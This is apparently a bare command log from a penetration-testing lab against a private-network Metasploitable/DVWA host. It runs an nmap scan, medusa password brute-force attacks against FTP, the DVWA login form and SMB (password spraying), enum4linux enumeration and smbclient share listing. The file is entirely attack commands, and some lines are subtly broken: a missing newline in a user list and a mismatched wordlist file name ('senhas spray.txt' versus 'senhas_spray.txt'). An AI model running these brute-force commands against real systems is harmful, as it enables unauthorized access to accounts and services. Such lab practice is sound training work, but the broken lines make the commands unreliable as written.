nmap -sV -p 21,22,80,445,139 192.168.56.103
ftp 192.168.56.103

echo -e "user\nmsadmin\admin\nroot" > users.txt
echo -e "123456\npassword\nqwerty\nmsfadmin" > pass.txt
medusa -h 192.168.56.103 -U users.txt -P pass.txt -M ftp -t 6
ftp 192.168.56.103

echo -e "user\nmsadmin\admin\nroot" > users.txt
echo -e "123456\npassword\nqwerty\nmsfadmin" > pass.txt
medusa -h 192.168.56.103 -U users.txt -P pass.txt -M http \
-m PAGE: '/dvwa/login.php' \
-m FORM: 'username=^USER^&password=^PASS^&Login=Login' \
-m 'FAIL=Login failed' -t 6

enum4linux -a 192.168.56.103 | tee enum4_output.txt
less enum4_output.txt

echo -e "user\nmsadmin\nservice" > smb_users.txt
echo -e "password\n123456\nWecolme123\nmsfadmin" > senhas spray.txt
medusa -h 192.168.56.103 -U smb_users.txt -P senhas_spray.txt -M smbnt -t 2 -T 50

smbclient -L //192.168.56.103 -U msfadmin





